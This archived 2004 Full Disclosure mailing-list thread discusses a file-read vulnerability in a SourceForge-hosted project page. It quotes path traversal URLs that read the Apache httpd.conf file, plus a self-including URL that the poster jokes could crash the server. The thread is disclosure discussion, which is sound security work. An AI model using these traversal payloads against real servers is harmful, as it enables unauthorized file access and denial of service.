Full Disclosure mailing list archives
RE: Vulnerability in sourceforge.net
From: "Andrew Poodle" <andrewp () IRW co uk>
Date: Wed, 21 Jul 2004 15:09:45 +0100
Don't even think about trying this then... http://btmgr.sourceforge.net/index.php3?body=../../../../../../home/groups/b/bt/btmgr/htdocs/index.php3 Don't want to crash sourceforge by getting it into an infinite loop now do we? a
-----Original Message----- From: full-disclosure-admin () lists netsys com [mailto:full-disclosure-admin () lists netsys com]On Behalf Of nicolas vigier Sent: 21 July 2004 09:00 To: Alexander Cc: full-disclosure () lists netsys com Subject: Re: [Full-disclosure] Vulnerability in sourceforge.net On Wed, 21 Jul 2004, Alexander wrote:Vulnerability in sourceforge.net. Remote user can read any files. Example:Any file the webserver account can read.http://btmgr.sourceforge.net/index.php3?body=../../../../../.. /usr/local/apache/conf/httpd.confThis is not a vulnerability in sourceforge, but in on of the project's webpage. And anyone with a project on sourceforge can read the same files using his webspace. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
This document should only be read by those persons to whom it is addressed and is not intended to be relied upon by any person without subsequent written confirmation of its contents. Accordingly IRW Solutions Group Ltd disclaim all responsibility and accept no liability (including in negligence) for the consequences for any person acting, or refraining from acting, on such information prior to the receipt by those persons of subsequent written confirmation. If you have received this e-mail message in error, please notify us immediately. Please also destroy and delete the message from your computer. Any form of reproduction, dissemination, copying, disclosure, modification, distribution and/or publication of this e-mail message is strictly prohibited. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Vulnerability in sourceforge.net Alexander (Jul 21)
- Re: Vulnerability in sourceforge.net nicolas vigier (Jul 21)
- RE: Vulnerability in sourceforge.net Todd Towles (Jul 21)
- Re: Vulnerability in sourceforge.net nicolas vigier (Jul 21)
- RE: Vulnerability in sourceforge.net Todd Towles (Jul 21)
- Message not available
- Re: Vulnerability in sourceforge.net nicolas vigier (Jul 21)
- Re: Vulnerability in sourceforge.net Buick Sk (Jul 21)
- RE: Vulnerability in sourceforge.net Todd Towles (Jul 21)
- Re: Vulnerability in sourceforge.net nicolas vigier (Jul 21)
- <Possible follow-ups>
- RE: Vulnerability in sourceforge.net Andrew Poodle (Jul 21)
- Re: Vulnerability in sourceforge.net Dan Duplito (Jul 21)
- RE: Vulnerability in sourceforge.net Todd Towles (Jul 22)
- Re: Vulnerability in sourceforge.net Gregory A. Gilliss (Jul 22)
- Re: Vulnerability in sourceforge.net Jedi/Sector One (Jul 22)
- RE: Vulnerability in sourceforge.net Todd Towles (Jul 22)
- Re: Vulnerability in sourceforge.net Anders B Jansson (Jul 22)
- Re: Vulnerability in sourceforge.net steve menard (Jul 22)
- Re: Vulnerability in sourceforge.net a (Jul 22)
- RE: Vulnerability in sourceforge.net Todd Towles (Jul 22)
- Re: Vulnerability in sourceforge.net J.A. Terranson (Jul 22)
- Re: Vulnerability in sourceforge.net nicolas vigier (Jul 22)